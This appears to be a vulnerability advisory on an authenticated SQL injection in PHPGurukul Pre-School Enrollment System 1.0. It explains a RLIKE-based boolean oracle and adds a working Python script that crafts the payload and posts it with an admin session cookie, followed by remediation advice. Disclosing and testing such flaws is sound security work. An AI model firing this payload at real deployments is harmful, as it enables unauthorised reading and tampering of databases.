PHPGurukul Pre-School Enrollment System SQL Injection Vulnerability

Vulnerability

A critical SQL injection vulnerability has been identified in PHPGurukul Pre-School Enrollment System version 1.0. The issue resides in the '/admin/add-class.php' file, where the attacker-controlled 'classname' POST parameter is concatenated into a SQL query without sanitisation, allowing an attacker to inject arbitrary SQL. The endpoint sits under the admin panel and, as the reproduction step notes, requires a valid session cookie, so this is an authenticated (post-login) injection. It can be exploited remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows unauthorized read access to the application database, manipulation or deletion of its data, and leakage of sensitive information such as stored credentials. Depending on the privileges of the database account the application connects with, it could also lead to broader control over the host and disruption of services.

Reproduction

To reproduce this vulnerability, send a POST request to '/preschool/admin/add-class.php' (the leading '/preschool/' is the install directory and will vary by deployment) with the 'classname' parameter crafted to include a SQL injection payload. The public proof of concept uses MySQL's RLIKE operator as a boolean oracle: RLIKE raises an error when its right-hand side is not a valid regular expression, so a CASE expression that yields a valid pattern when a chosen condition is true and an invalid one (for example the lone character '(') when it is false produces a visibly different response for each branch. The request can be made with a tool such as Burp Suite and must include a valid PHP session cookie for a logged-in admin user.
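The check described above, written out as an added example (this is not the public exploit nor code from PHPGurukul). It assumes the target URL, the session cookie name and value, the presence of a 'submit' form field and the shape of the underlying INSERT statement, none of which are given on this page; the sample responses are constructed to show how the verdict logic behaves.

```python
"""Boolean/error-based SQL injection check for the 'classname' parameter.

Added example, not part of the original advisory. The request path, the
session cookie, the 'submit' field and the INSERT statement shape are
assumptions made for illustration.
"""
import urllib.parse
import urllib.request

# Assumed: default install directory and a logged-in admin session.
TARGET = "http://127.0.0.1/preschool/admin/add-class.php"
SESSION_COOKIE = "PHPSESSID=replace-with-a-valid-admin-session"

# Substrings MySQL/MariaDB put in the error raised by an invalid RLIKE pattern.
# Older servers say "Got error 'missing )' from regexp"; MySQL 8 (ICU) says
# "Mismatched parenthesis in regular expression." The wording varies, so
# match loosely and review a real response before trusting the verdict.
REGEXP_ERROR_MARKERS = ("regexp", "regular expression")


def build_payload(condition: str, prefix: str = "x") -> str:
    """Close the string literal, then use RLIKE as an oracle for `condition`.

    When the condition is true, RLIKE receives the pattern '1' and succeeds;
    when it is false it receives 0x28 ('(') which is an invalid regular
    expression and makes the query fail. The trailing AND keeps the statement
    syntactically valid whatever follows the injection point.
    """
    return (f"{prefix}' RLIKE (SELECT (CASE WHEN ({condition}) "
            f"THEN 1 ELSE 0x28 END)) AND 'a'='a")


def render_vulnerable_sql(classname: str) -> str:
    """Hypothetical query shape: shows how the quote in the payload breaks out.

    The real statement in add-class.php is not reproduced here; this is only
    the naive interpolation pattern that produces the vulnerability.
    """
    return f"INSERT INTO tblclass(ClassName) VALUES('{classname}')"


def has_regexp_error(body: str) -> bool:
    lowered = body.lower()
    return any(marker in lowered for marker in REGEXP_ERROR_MARKERS)


def verdict(true_body: str, false_body: str) -> str:
    """Compare the responses for a true and a false condition.

    'injectable'   - the false branch surfaced a regexp error, the true one did not
    'possible'     - bodies differ but no error text is shown (errors suppressed,
                     compare success messages or row counts by hand)
    'not detected' - both responses are identical
    """
    if has_regexp_error(false_body) and not has_regexp_error(true_body):
        return "injectable"
    if true_body != false_body:
        return "possible"
    return "not detected"


def post_classname(url: str, classname: str, cookie: str, timeout: int = 10) -> str:
    """Send the form as the browser would. Each call inserts a row on success."""
    data = urllib.parse.urlencode({"classname": classname, "submit": "submit"}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Cookie", cookie)
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample responses, used to exercise the verdict logic offline.
SAMPLE_TRUE = "<html><body>Class has been added successfully</body></html>"
SAMPLE_FALSE = "<html><body>Got error 'missing )' from regexp</body></html>"


if __name__ == "__main__":
    print(render_vulnerable_sql(build_payload("1=1")))
    body_true = post_classname(TARGET, build_payload("1=1"), SESSION_COOKIE)
    body_false = post_classname(TARGET, build_payload("1=2"), SESSION_COOKIE)
    print(verdict(body_true, body_false))
```

Run it only against a lab copy you are authorised to test: the true-branch request actually inserts a class row, so the check is not side-effect free. If the application suppresses mysqli errors, the regexp message never reaches the response and the script falls back to a plain body comparison, which is weaker; in that case use a time-based condition or check the class list for the inserted row instead.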

Remediation

No vendor patch is known. Until one is available, apply the standard defences against SQL injection: pass user input to the database only through prepared statements with bound parameters (mysqli prepare/bind_param or PDO in PHP), and do not rely on escaping or input filtering alone. Because the affected endpoint is part of the admin panel, restricting access to '/admin/' and rotating admin credentials also reduce exposure.

Added: Jun 20, 2025, 9:26 AM
Updated: Jun 20, 2025, 9:26 AM

Vulnerability Rating

Custom Algorithm

spread: 1.0
impact: 10.0
exploitability: 6.8
remediation: 0.0
relevance: 0.2
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.